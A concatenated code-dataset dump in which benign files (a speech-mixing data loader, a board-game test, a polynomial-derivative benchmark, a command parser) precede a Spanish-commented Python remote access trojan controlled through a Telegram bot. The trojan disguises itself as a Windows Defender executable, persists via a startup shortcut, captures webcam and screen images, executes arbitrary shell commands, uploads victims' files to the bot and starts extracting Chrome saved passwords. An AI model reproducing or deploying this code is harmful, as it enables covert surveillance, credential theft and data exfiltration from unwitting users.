mix_k=random.sample(mix_number_list,1)[0]\n batch_idx = 0\n mix_speechs = np.zeros((config.batch_size, config.MAX_LEN))\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = []\n mix_angle= []\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = []\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = []\n multi_spk_angle_list = []\n multi_spk_order_list=[] #用来管理每个混合语音里说话人的能俩给你大小的order\n multi_spk_wav_list = []\n continue\n\n all_over = 1 # 用来判断所有的是不是都结束了\n for kkkkk in mix_number_list:\n if not sample_idx[kkkkk] >= batch_mix[mix_k] * config.batch_size:\n print(kkkkk, 'mixed data is not over')\n all_over = 0\n break\n if all_over:\n print('all mix number is over~!')\n yield False\n\n # mix_k=random.sample(mix_number_list,1)[0]\n if train_or_test == 'train':\n aim_spk_k = random.sample(all_spk_train, mix_k) # 本次混合的候选人\n elif train_or_test == 'eval':\n aim_spk_k = random.sample(all_spk_eval, mix_k) # 本次混合的候选人\n elif train_or_test == 'test':\n aim_spk_k = random.sample(all_spk_test, mix_k) # 本次混合的候选人\n elif train_or_test == 'eval_test':\n aim_spk_k = random.sample(all_spk_evaltest, mix_k) # 本次混合的候选人\n\n aim_spk_k = re.findall('/([0-9][0-9].)/', all_samples_list[mix_k][sample_idx[mix_k]])\n # aim_spk_db_k = map(float, re.findall(' (.*?) ', all_samples_list[mix_k][sample_idx[mix_k]]))\n aim_spk_db_k = [float(dd) for dd in re.findall(' (.*?) ', all_samples_list[mix_k][sample_idx[mix_k]])]\n aim_spk_samplename_k = re.findall('/(.{8})\\.wav ', all_samples_list[mix_k][sample_idx[mix_k]])\n assert len(aim_spk_k) == mix_k == len(aim_spk_db_k) == len(aim_spk_samplename_k)\n\n multi_fea_dict_this_sample = {}\n multi_wav_dict_this_sample = {}\n multi_name_list_this_sample = []\n multi_db_dict_this_sample = {}\n\n # if 1 and config.dB and config.MIN_MIX==config.MAX_MIX==2:\n # dB_rate=10**(config.dB/20.0*np.random.rand())#e**(0——0.5)\n # print('channel to change with dB:',dB_rate\n\n for k, spk in enumerate(aim_spk_k):\n # 选择dB的通道~!\n sample_name = aim_spk_samplename_k[k]\n if train_or_test != 'test':\n spk_speech_path = data_path + '/' + 'train' + '/' + spk + '/' + sample_name + '.wav'\n else:\n spk_speech_path = data_path + '/' + 'eval_test' + '/' + spk + '/' + sample_name + '.wav'\n\n signal, rate = sf.read(spk_speech_path) # signal 是采样值,rate 是采样频率\n if len(signal.shape) > 1:\n signal = signal[:, 0]\n if rate != config.FRAME_RATE:\n # 如果频率不是设定的频率则需要进行转换\n signal = resampy.resample(signal, rate, config.FRAME_RATE, filter='kaiser_best')\n\n random_shift= 16000\n signal = np.append(signal[random_shift:], signal[:random_shift])\n\n config.MAX_LEN=random_len(average_speech_len,0.1)\n if signal.shape[0] > config.MAX_LEN: # 根据最大长度裁剪\n signal = signal[:config.MAX_LEN]\n # 更新混叠语音长度\n if signal.shape[0] > mix_len:\n mix_len = signal.shape[0]\n\n this_spk_signal_list=[]\n signal -= np.mean(signal) # 语音信号预处理,先减去均值\n signal /= np.max(np.abs(signal)) # 波形幅值预处理,幅值归一化\n\n # 如果需要augment数据的话,先进行随机shift, 以后考虑固定shift\n if config.AUGMENT_DATA and train_or_test == 'train':\n random_shift = random.sample(range(len(signal)), 1)[0]\n signal = np.append(signal[random_shift:], signal[:random_shift])\n\n if signal.shape[0] < config.MAX_LEN: # 根据最大长度用 0 补齐,\n signal = np.append(signal, np.zeros(config.MAX_LEN - signal.shape[0]))\n\n this_spk_signal_list.append(signal)\n for spk_idx in range(num_rounds-1): # for the rest rounds of spks\n signal1, rate = sf.read('/'.join(spk_speech_path.split('/')[:-1])+'/'+random.choice(os.listdir('/'.join(spk_speech_path.split('/')[:-1])))) # signal 是采样值,rate 是采样频率\n config.MAX_LEN = random_len(average_speech_len,0.1)\n if len(signal1.shape) > 1:\n signal1 = signal1[:, 0]\n if rate != config.FRAME_RATE:\n # 如果频率不是设定的频率则需要进行转换\n signal1 = resampy.resample(signal1, rate, config.FRAME_RATE, filter='kaiser_best')\n random_shift = 16000\n signal = np.append(signal[random_shift:], signal[:random_shift])\n if signal1.shape[0] > config.MAX_LEN: # 根据最大长度裁剪\n signal1 = signal1[:config.MAX_LEN]\n\n signal1 -= np.mean(signal1) # 语音信号预处理,先减去均值\n signal1 /= np.max(np.abs(signal1)) # 波形幅值预处理,幅值归一化\n\n # 如果需要augment数据的话,先进行随机shift, 以后考虑固定shift\n if config.AUGMENT_DATA and train_or_test == 'train':\n random_shift = random.sample(range(len(signal1)), 1)[0]\n signal1 = np.append(signal1[random_shift:], signal1[:random_shift])\n\n if signal1.shape[0] < config.MAX_LEN: # 根据最大长度用 0 补齐,\n signal1 = np.append(signal1, np.zeros(config.MAX_LEN - signal1.shape[0]))\n\n this_spk_signal_list.append(signal1)\n\n if k == 0: # 第一个作为目标\n this_spk_wav = np.zeros((num_rounds * average_speech_len * mix_k))\n ratio = 10 ** (aim_spk_db_k[k] / 20.0)\n this_spk_signal_list_new= []\n for sig in this_spk_signal_list:\n new_sig = sig*ratio\n ratio = 1 / ratio # 轮流交换幅度的变化\n interval_time = np.zeros(random_len((mix_k-1)*average_speech_len,0.5))\n this_spk_signal_list_new.append(new_sig)\n if sig is not this_spk_signal_list[-1]:\n this_spk_signal_list_new.append(interval_time)\n\n signal = np.concatenate(this_spk_signal_list_new,0)\n tmp_len=np.min((signal.size,this_spk_wav.size),0)\n this_spk_wav[:tmp_len]=signal[:tmp_len]\n aim_spkname.append(aim_spk_k[0])\n # aim_spk=eval(re.findall('\\d+',aim_spk_k[0])[0])-1 #选定第一个作为目标说话人\n # TODO:这里有个问题是spk是从1开始的貌似,这个后面要统一一下 --> 已经解决,构建了spk和idx的双向索引\n\n signal = this_spk_wav\n aim_spkid.append(aim_spkname)\n wav_mix = signal\n aim_fea_clean = np.transpose(np.abs(librosa.core.spectrum.stft(signal, config.FRAME_LENGTH,\n config.FRAME_SHIFT)))\n if output_tmp_wav:\n sf.write('batch_output_test/{}_{}_real.wav'.format(batch_idx,0),signal,8000)\n aim_fea.append(aim_fea_clean)\n # 把第一个人顺便也注册进去混合dict里\n multi_fea_dict_this_sample[spk] = aim_fea_clean\n multi_wav_dict_this_sample[spk] = signal\n\n else:\n this_spk_wav = np.zeros((num_rounds * average_speech_len * mix_k))\n ratio = 10 ** (aim_spk_db_k[k] / 20.0)\n this_spk_signal_list_new= []\n\n interval_time = np.zeros(random_len(k* average_speech_len, 0.5))\n this_spk_signal_list_new.append(interval_time)\n for sig in this_spk_signal_list:\n new_sig = sig*ratio\n ratio = 1 / ratio # 轮流交换幅度的变化\n interval_time = np.zeros(random_len((mix_k-1)*average_speech_len,0.5))\n this_spk_signal_list_new.append(new_sig)\n if sig is not this_spk_signal_list[-1]:\n this_spk_signal_list_new.append(interval_time)\n signal = np.concatenate(this_spk_signal_list_new,0)\n tmp_len=np.min((signal.size,this_spk_wav.size),0)\n this_spk_wav[:tmp_len]=signal[:tmp_len]\n signal = this_spk_wav\n if output_tmp_wav:\n sf.write('batch_output_test/{}_{}_real.wav'.format(batch_idx,k),signal,8000)\n\n wav_mix = wav_mix + signal # 混叠后的语音\n #  这个说话人的语音\n some_fea_clean = np.transpose(np.abs(librosa.core.spectrum.stft(signal, config.FRAME_LENGTH,\n config.FRAME_SHIFT, )))\n multi_fea_dict_this_sample[spk] = some_fea_clean\n multi_wav_dict_this_sample[spk] = signal\n\n if output_tmp_wav:\n sf.write('batch_output_test/{}_mix.wav'.format(batch_idx),wav_mix, 8000)\n multi_spk_fea_list.append(multi_fea_dict_this_sample) # 把这个sample的dict传进去\n multi_spk_wav_list.append(multi_wav_dict_this_sample) # 把这个sample的dict传进去\n\n # 这里采用log 以后可以考虑采用MFCC或GFCC特征做为输入\n if config.IS_LOG_SPECTRAL:\n feature_mix = np.log(np.transpose(np.abs(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH,\n config.FRAME_SHIFT,\n window=config.WINDOWS)))\n + np.spacing(1))\n else:\n feature_mix = np.transpose(np.abs(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH,\n config.FRAME_SHIFT, )))\n\n mix_speechs[batch_idx, :] = wav_mix\n mix_feas.append(feature_mix)\n mix_phase.append(np.transpose(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH, config.FRAME_SHIFT, )))\n mix_angle.append(np.angle(np.transpose(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH, config.FRAME_SHIFT, ))))\n batch_idx += 1\n # print('batch_dix:{}/{},'.format(batch_idx,config.batch_size),)\n if batch_idx == config.batch_size: # 填满了一个batch\n # 下一个batch的混合说话人个数, 先调整一下\n mix_k = random.sample(mix_number_list, 1)[0]\n mix_feas = np.array(mix_feas)\n mix_phase = np.array(mix_phase)\n aim_fea = np.array(aim_fea)\n mix_angle = np.array(mix_angle)\n # aim_spkid=np.array(aim_spkid)\n query = np.array(query)\n print(('spk_list_from_this_gen:{}'.format(aim_spkname)))\n print(('aim spk list:', [list(one.keys()) for one in multi_spk_fea_list]))\n batch_ordre=get_energy_order(multi_spk_fea_list)\n # print('\\nmix_speechs.shape,mix_feas.shape,aim_fea.shape,aim_spkname.shape,query.shape,all_spk_num:'\n # print(mix_speechs.shape,mix_feas.shape,aim_fea.shape,len(aim_spkname),query.shape,len(all_spk)\n if mode == 'global':\n all_spk = sorted(all_spk)\n all_spk = sorted(all_spk_train)\n all_spk.insert(0, '') # 添加两个结构符号,来标识开始或结束。\n all_spk.append('')\n all_spk_eval = sorted(all_spk_eval)\n all_spk_test = sorted(all_spk_test)\n dict_spk_to_idx = {spk: idx for idx, spk in enumerate(all_spk)}\n dict_idx_to_spk = {idx: spk for idx, spk in enumerate(all_spk)}\n yield {'all_spk': all_spk,\n 'dict_spk_to_idx': dict_spk_to_idx,\n 'dict_idx_to_spk': dict_idx_to_spk,\n 'num_fre': aim_fea.shape[2], # 语音频率\n 'num_frames': aim_fea.shape[1], # 语音长度\n 'total_spk_num': len(all_spk),\n 'total_batch_num': batch_total\n }\n elif mode == 'once':\n yield {'mix_wav': mix_speechs,\n 'mix_feas': mix_feas,\n 'mix_phase': mix_phase,\n 'mix_angle': mix_angle,\n 'aim_fea': aim_fea,\n 'aim_spkname': aim_spkname,\n 'query': query,\n 'num_all_spk': len(all_spk),\n 'multi_spk_fea_list': multi_spk_fea_list,\n 'multi_spk_wav_list': multi_spk_wav_list,\n 'multi_spk_angle_list': multi_spk_angle_list,\n 'batch_order': batch_ordre,\n 'batch_total': batch_total,\n 'tas_zip': _collate_fn(mix_speechs,multi_spk_wav_list,batch_ordre)\n }\n elif mode == 'tasnet':\n yield _collate_fn(mix_speechs,multi_spk_wav_list)\n\n batch_idx = 0\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = []\n mix_angle = []\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = []\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = []\n multi_spk_wav_list = []\n multi_spk_angle_list = []\n sample_idx[mix_k] += 1\n\n else:\n raise ValueError('No such dataset:{} for Speech.'.format(config.DATASET))\n pass\n\n # 图像刺激\n elif config.MODE == 2:\n pass\n\n # 视频刺激\n elif config.MODE == 3:\n raise ValueError('No such dataset:{} for Video'.format(config.DATASET))\n # 概念刺激\n elif config.MODE == 4:\n pass\n\n else:\n raise ValueError('No such Model:{}'.format(config.MODE))\n\n# aa=prepare_data('tasnet','train')\n# bb=next(aa)\n# bb=next(aa)\n#\n# print(bb)\n","sub_path":"TDAAv4_PIT_23/predata_fromList_123_2rounds.py","file_name":"predata_fromList_123_2rounds.py","file_ext":"py","file_size_in_byte":26908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258457740","text":"import unittest\nfrom board import Board\nfrom move import Move\n\n\nletter_grid = [['a1', 'a2', 'a3','a4','a5'],\n ['b1', 'b2', 'b3','b4','b5'],\n ['c1','c2','c3','c4','c5'],\n ['d1','d2','d3','d4','d5'],\n ['e1','e2','e3','e4','e5'],\n ]\nnumber_grid = [[0, 1, 0, 0, 0],\n [1, 1, 0, 1, 1],\n [0, 0, 0, 2, 1],\n [0, 2, 0, 2, 0],\n [2, 0, 2, 1, 2],\n ]\n\n\nclass BoardTest(unittest.TestCase):\n def test_print(self):\n b = Board()\n b.grid = number_grid\n b.print_board()\n\n def test_legal(self):\n b = Board()\n b.grid = number_grid\n mv = Move.from_desc(\"b2\")\n self.assertEqual(b.move_ok(mv), False)\n mv = Move.from_desc(\"b1\")\n self.assertEqual(b.move_ok(mv), True)\n\n def test_gen_move(self):\n b = Board()\n b.grid = number_grid\n mvs = b.gen_moves()\n for mv in mvs:\n print(mv.name())\n\n def test_capture(self):\n b = Board()\n b.grid = number_grid\n b.capture(4, 3)\n print(b.grid)\n b.capture(1, 1)\n print(b.grid)\n\n def test_copy(self):\n b = Board()\n bo = Board()\n bo.copy(b)\n bo.grid[0][0] = 1\n self.assertNotEqual(bo.grid[0][0], b.grid[0][0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"88636858","text":"helper_str = \"\"\"\n\"\"\"\n\ndef computeDeriv(poly):\n result = []\n i = 1\n if len(poly) == 1:\n result.append(0.0)\n while i < len(poly):\n result.append(poly[i] * float(i))\n i += 1\n return result\n\ndef same_output(x, y):\n return x == y\n\ntest_cases = [\n ([-13.39, 0.0, 17.5, 3.0, 1.0],),\n ([1.0, 4.0, 2.0],),\n ([4.0],),\n ([2.3, 4.4],)\n]\n\n","sub_path":"benchmarks/computeDeriv/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"346748814","text":"\r\nimport re\r\nfrom krparser import KrParser\r\nfrom krlib.krfactory import KrFactory\r\nfrom krlib.krdev import *\r\nfrom krlib.types.krstring import KrString\r\nfrom krlib.types.krbase import KrTypeBase\r\nfrom krlib.types.krint import KrInteger\r\nfrom krlib.types.krurl import KrUrl\r\n\r\nREGEX = re.compile(r'^(\\.(\\w+) *\\().*\\)')\r\n\r\n\r\n\r\nclass KrCommandParser(KrParser):\r\n\r\n\tdef __init__(self, *args):\r\n\t\tsuper(KrCommandParser, self).__init__(args)\r\n\t\tself.m_functions = []\r\n\t\tself.m_name = \"\"\r\n\t\tself.m_params = []\r\n\t\tself.m_prefix = \"\"\r\n\t\t\r\n\r\n\tdef parse(self, str, pos, prefix):\r\n\t\tKrDebug.debug(1, \"Parsing string |%s|\" % str[pos:])\r\n\t\tself.m_prefix = prefix\r\n\t\tif prefix in \"$.+?{}[]\":\r\n\t\t\tregex = re.compile(r'(^\\%s(\\w+) *\\().*\\)' % prefix)\r\n\t\telse:\r\n\t\t\tregex = re.compile(r'(^z%s(\\w+) *\\().*\\)' % prefix)\r\n\r\n\t\tmatch = regex.search(str[pos:])\r\n\t\tif not match:\r\n\t\t\tKrDebug.debug(\"not found\")\r\n\t\t\treturn pos\r\n\r\n\t\tKrDebug.debug(2, \"name '%s' found\" % match.group(2))\r\n\t\t#if not self.isValidCommand(match.group(2)):\r\n\t\t#\treturn self.onParseFail(str, str, \"Unknown command %s\" % match.group(2))\r\n\t\tself.m_name = match.group(2)\r\n\t\topos = pos\r\n\t\tpos += len(match.group(1))\r\n\t\tret = self.parseParams(str, pos)\r\n\t\tif ret == pos:\r\n\t\t\treturn opos\r\n\t\treturn self.onParseSuccess(str, pos)\r\n\t\t\r\n\t\t\t\r\n\tdef parseParams(self, str, pos):\r\n\t\tKrDebug.debug(1, \"Parsing params at <%s>\" % str[pos:])\r\n\t\tis_string = False\r\n\t\tbuff = \"\"\r\n\t\topos = pos\r\n\t\twhile pos < len(str):\r\n\t\t\tif str[pos] == ')' and not is_string:\r\n\t\t\t\tif buff != \"\":\r\n\t\t\t\t\tKrDebug.debug(2, \"Param <%s> found\" % buff)\r\n\t\t\t\t\tself.saveParam(buff)\r\n\t\t\t\treturn pos+1\r\n\t\t\t\r\n\t\t\tif str[pos] == is_string and str[pos-1] != '\\\\':\r\n\t\t\t\tKrDebug.debug(2, \"String Param <%s> found\" % buff)\r\n\t\t\t\tself.saveParam(buff, KrString)\r\n\t\t\t\tis_string = False\r\n\t\t\t\tbuff = \"\"\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif (str[pos] == '\"' or str[pos] == \"'\") and not is_string:\r\n\t\t\t\tKrDebug.debug(3, \"Starting String Mode |%s|\" % str[pos:])\r\n\t\t\t\tis_string = str[pos]\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif str[pos] == \",\" and not is_string:\r\n\t\t\t\tKrDebug.debug(2, \"Param <%s> found\" % buff)\r\n\t\t\t\tif buff != \"\":\r\n\t\t\t\t\tself.saveParam(buff)\r\n\t\t\t\t\tbuff = \"\"\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\tif str[pos] == \" \" and not is_string:\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif KrFactory.getCommandParser(str[pos], None) and not is_string:\r\n\t\t\t\tKrDebug.debug(2, \"Command found at <%s>\" % str[pos:])\r\n\t\t\t\ts = KrFactory.getCommandParser(str[pos])()\r\n\t\t\t\tret = s.parse(str, pos, str[pos])\r\n\t\t\t\tif ret == pos:\r\n\t\t\t\t\treturn self.onParseFail(ret, ostr)\r\n\t\t\t\tpos = ret\r\n\t\t\t\tself.saveParam(s)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tbuff += str[pos]\r\n\t\t\tpos += 1\r\n\r\n\tdef saveParam(self, param, type_=None):\r\n\t\tp = None\r\n\t\tif isinstance(param, KrParser):\r\n\t\t\tp = param\r\n\t\telif type_ == KrString or not param.isdigit():\r\n\t\t\tp = KrString(param)\r\n\t\telif param.isdigit():\r\n\t\t\tp = KrInteger(int(param))\r\n\t\tself.m_params.append(p)\r\n\t\tKrDebug.debug(50, \"Param of type %s saved\" % type(p))\r\n\t\t\t\r\n\tdef isValidCommand(self):\r\n\t\treturn \"%s%s\" % (self.m_prefix, self.m_name) in KrParser.s_command\r\n\t\t\r\n\tdef isValidParam(self, param):\r\n\t\treturn True\r\n\t\t\t\r\n\tdef onParseFail(self, str, return_, error=None):\r\n\t\t#KrDebug.debug(0, \"ERROR : when parsing %s \\r\\n %s\" % (str, error ))\r\n\t\treturn return_\r\n\t\r\n\tdef getValue(self, **kwargs):\r\n\t\tparams = []\r\n\t\tfor i in self.m_params:\r\n\t\t\t#print \"!!! %s\" % i\r\n\t\t\tif isinstance(i, KrParser):\r\n\t\t\t\tparams.append(i.getValue(kwargs.get('context')))\r\n\t\t\telif isinstance(i, KrTypeBase):\r\n\t\t\t\ti.setContext(kwargs.get('context'))\r\n\t\t\t\tparams.append(i)\r\n\t\t\telse:\r\n\t\t\t\traise(self.__clas__, \"Unkwown type for eval\")\r\n\t\tif not KrFactory.getCommand('%s%s' % (self.m_prefix, self.m_name), None):\r\n\t\t\traise Exception(\"Can't find command '%s%s'\" % (self.m_prefix, self.m_name))\r\n\t\treturn KrFactory.getCommand('%s%s' % (self.m_prefix, self.m_name))(*params, **kwargs)\r\n\t\t\r\n\t\t\r\n\r\n\tdef onParseSuccess(self, str, pos):\r\n\r\n\t\treturn pos\r\n\t\t\r\n\t\tstr = KrParser.onParseSuccess(self, str)\r\n\t\tostr = str\r\n\t\tmatch = REGEX.search(str)\r\n\t\twhile match:\r\n\t\t\tf = KrParser()\r\n\t\t\tret = f.parseCommand(str, '.')\r\n\t\t\tif ret == str:\r\n\t\t\t\treturn ostr\r\n\t\t\tstr = ret\r\n\t\t\tself.m_functions.append(f)\r\n\t\t\tif len(str) == 0:\r\n\t\t\t\tbreak\r\n\t\t\tmatch = REGEX.search(str)\r\n\t\treturn str\r\n\r\nKrFactory.registerCommandParser('$', KrCommandParser)\r\n\r\n\t\t","sub_path":"krlib/krparser/krcommand.py","file_name":"krcommand.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234335089","text":"# v3.0\n\nimport os, os.path, platform, ctypes\nos.environ[\"PBR_VERSION\"]='5.0.0'\nimport logging\nfrom winreg import *\nfrom consoleTools import consoleDisplay as cd\nfrom PIL import ImageGrab # /capture_pc\nfrom shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv\nfrom sys import argv, path, stdout # console output\nfrom json import loads # reading json from ipinfo.io\nfrom winshell import startup # persistence\nfrom tendo import singleton # this makes the application exit if there's another instance already running\nfrom win32com.client import Dispatch # WScript.Shell\nfrom time import strftime, sleep\nfrom subprocess import Popen, PIPE # /cmd_exec\nfrom getpass import getuser # Obtiene el nombre del usuario\nimport psutil # updating\nfrom pynput.keyboard import Key, Listener\nimport shutil\nimport win32clipboard # register clipboard\nimport sqlite3 # get chrome passwords\nimport win32crypt # get chrome passwords\nimport base64 # /encrypt_all\nimport datetime # /schedule\nimport time\nimport threading # /proxy, /schedule\nimport proxy\nimport pyaudio, wave # /hear\nimport telepot, requests # telepot => telegram, requests => file download\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\nimport pythoncom, pyHook # keylogger\nimport socket # internal IP\nimport getpass # get username\nimport collections\nimport urllib # wallpaper\nimport cv2 # webcam\nimport yagmail\nfrom datetime import datetime \nfrom ctypes import * # fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145\n\ntry: # Crea dirección\n os.makedirs('C:\\\\Users\\\\Public\\\\Security\\\\Windows Defender')\nexcept:\n pass\nnameKey = \"WindowsDefenderAdvanced.exe\"\nfilePath = \"C:\\\\Users\\\\Public\\\\Security\\\\Windows Defender\\\\\"+ nameKey\ntry:\n with open(filePath, 'r') as f: # Verifica si el keylogger se encuentra oculto en el sistema\n print(\"El keylogger ya se encuentra en la carpeta oculta\")\nexcept :\n print(\"El Keylogger no se encuentra en el sistema, y tratará de copiarlo\")\n try:\n shutil.copy(nameKey , filePath) # Intenta ocultar el keylogger en una carpeta\n print(\"El keylogger se escondió exitosamente en el sistema\")\n except:\n print(\"No se puedo esconder el Keylogger en el sistema\")\ntry: # Intenta crear la dirección\n os.makedirs('logs')\nexcept:\n pass\n \ncd.log('i','Starting')\nme = singleton.SingleInstance()\n\ntoken = 'xx:xx' # <== Aquí debes ingresar el codigo único de tu Bot\nif 'RVT_TOKEN' in os.environ: # it can also be set as an environment variable\n token = os.environ['RVT_TOKEN']\n \napp_name = 'Microsoft' # Nombre de la carpeta en dentro delRoaming\nknown_ids = [''] # Ejemplo => 991466973 <= Ejemplo # AGREGUE SU chat_id EN FORMATO DE CADENA A LA LISTA A CONTINUACIÓN SI DESEA QUE SU BOTELO SOLO RESPONDA A UNA PERSONA\nappdata_roaming_folder = os.environ['APPDATA']\nhide_folder = appdata_roaming_folder + '\\\\' + app_name #Carpeta escondite\ncompiled_name = app_name + '.exe' # ruta donde se compilará\ntarget_shortcut = startup() + '\\\\' + compiled_name.replace('.exe', '.lnk')\nif not os.path.exists(hide_folder):\n\tos.makedirs(hide_folder)\n\thide_compiled = hide_folder + '\\\\' + compiled_name\n\tcopyfile(argv[0], hide_compiled)\n\tshell = Dispatch('WScript.Shell')\n\tshortcut = shell.CreateShortCut(target_shortcut)\n\tshortcut.Targetpath = hide_compiled\n\tshortcut.WorkingDirectory = hide_folder\n\tshortcut.save()\nif not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):\n f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))\n f.close()\ndestroy = False\nuser = os.environ.get(\"USERNAME\")\t# Windows username to append keylogs\nschedule = {}\nlog_file = hide_folder + '\\\\.user'\nkeylogs_file = hide_folder + '\\\\.keylogs'\nwith open(log_file, \"a\") as writing:\n\twriting.write(\"-------------------------------------------------\\n\")\n\twriting.write(user + \" Log: \" + strftime(\"%b %d@%H:%M\") + \"\\n\\n\")\nlogging.basicConfig(filename=log_file,level=logging.DEBUG)\n\ndef runStackedSchedule(everyNSeconds): #Ejecuta en un horario predeterminado\n for k in schedule.keys():\n if k < datetime.datetime.now():\n handle(schedule[k])\n del schedule[k]\n threading.Timer(everyNSeconds, runStackedSchedule).start()\ndef internalIP():\n internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n internal_ip.connect(('google.com', 0))\n return internal_ip.getsockname()[0]\ndef checkchat_id(chat_id):\n return len(known_ids) == 0 or str(chat_id) in known_ids\ndef split_string(n, st):\n lst = ['']\n for i in str(st):\n l = len(lst) - 1\n if len(lst[l]) < n:\n lst[l] += i\n else:\n lst += [i]\n return lst\n\ndef send_safe_message(bot, chat_id, message):\n while(True):\n try:\n cd.log('n', 'Message sent:\\n{}'.format(\n bot.sendMessage(chat_id, message)), True)\n break\n except:\n pass\ndef handle(msg):\n chat_id = msg['chat']['id']\n if checkchat_id(chat_id):\n response = ''\n if 'text' in msg:\n cd.log('n', '\\n\\t\\tAdministrador con ID: ' + str(chat_id) + '\\n\\n Uso el comando:\\t\\t' + msg['text'] + '\\n\\n', True)\n command = msg['text']\n try:\n if command == '/redInfo': # Información de la RED\n response = ''\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('arp -a -N ' + internalIP())\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line \n elif command == '/webcam': # Captura de Web Cam \n bot.sendChatAction(chat_id, 'typing')\n camera = cv2.VideoCapture(0)\n while True:\n return_value, image = camera.read()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('image', gray)\n if cv2.waitKey(1) & 0xFF == ord('s'):\n cv2.imwrite('webcam.jpg', image)\n break\n camera.release()\n cv2.destroyAllWindows()\n bot.sendChatAction(chat_id, 'upload_photo')\n bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))\n os.remove('webcam.jpg')\n elif command == '/captura': # Captura de pantalla\n bot.sendChatAction(chat_id, 'typing') \n screenshot = ImageGrab.grab()\n screenshot.save('screenshot.jpg')\n bot.sendChatAction(chat_id, 'upload_photo')\n bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))\n os.remove('screenshot.jpg')\n elif command.startswith('/cmd'): # CMD \n try:\n cd.log('w', 'Command exec prep')\n process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)\n command = command.replace('/cmd', '')\n cd.log('w', 'Executing the command '+command)\n if len(command) > 1:\n process.stdin.write(bytes(command + '\\n'))\n process.stdin.close()\n lines = process.stdout.readlines()\n for l in lines:\n response += l\n else:\n response = '/cmd dir'\n except:\n response = 'Vuelve a escribir '\n elif command.startswith('/ir'): # Navegar entre carpetas\n command = command.replace('/ir ', '')\n try:\n os.chdir(command)\n response = os.getcwd() + '>'\n except:\n response = 'No subfolder matching ' + command\n elif command == '/cmd_dns': # Informacion DNS\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('ipconfig /displaydns')\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line\n elif command == '/cmd_ipconfig': # Informacion IPConfig\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('ipconfig /all')\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line\n elif command.startswith('/descargar'): # Descargar un archivo\n bot.sendChatAction(chat_id, 'typing')\n path_file = command.replace('/descargar', '')\n path_file = path_file[1:]\n if path_file == '':\n response = '/descargar C:/path/to/file.name or /descargarfile.name'\n else:\n bot.sendChatAction(chat_id, 'upload_document')\n try:\n bot.sendDocument(chat_id, open(path_file, 'rb'))\n except:\n try:\n bot.sendDocument(chat_id, open(\n hide_folder + '\\\\' + path_file))\n response = 'Found in hide_folder: ' + hide_folder\n except:\n response = 'Could not find ' + path_file\n elif command.startswith('/copiar'): # Copia archivos\n command = command.replace('/copiar', '')\n command = command.strip()\n if len(command) > 0:\n try:\n file1 = command.split('\"')[1]\n file2 = command.split('\"')[3]\n copyfile(file1, file2)\n response = 'Archivos copiados exitosamente.'\n except Exception as e:\n response = 'Error: \\n' + str(e)\n else:\n response = 'Usage: \\n/copiar \"C:/Users/DonaldTrump/Desktop/porn.jpg\" \"C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]\"'\n response += '\\n\\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'\n elif command.endswith('block_key'): # Bloquear teclado\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('block_mouse'): # Bloquear Mouse\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('desblock_mouse'): # Desbloquear Mouse\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('desblock_mouse'):\n response = 'Ésta funcionalidad, está en proceso' \n elif command == '/get_chrome': # Obtiene contraseñas de Chrome\n con = sqlite3.connect(os.path.expanduser(\n '~') + r'\\AppData\\Local\\Google\\Chrome\\User 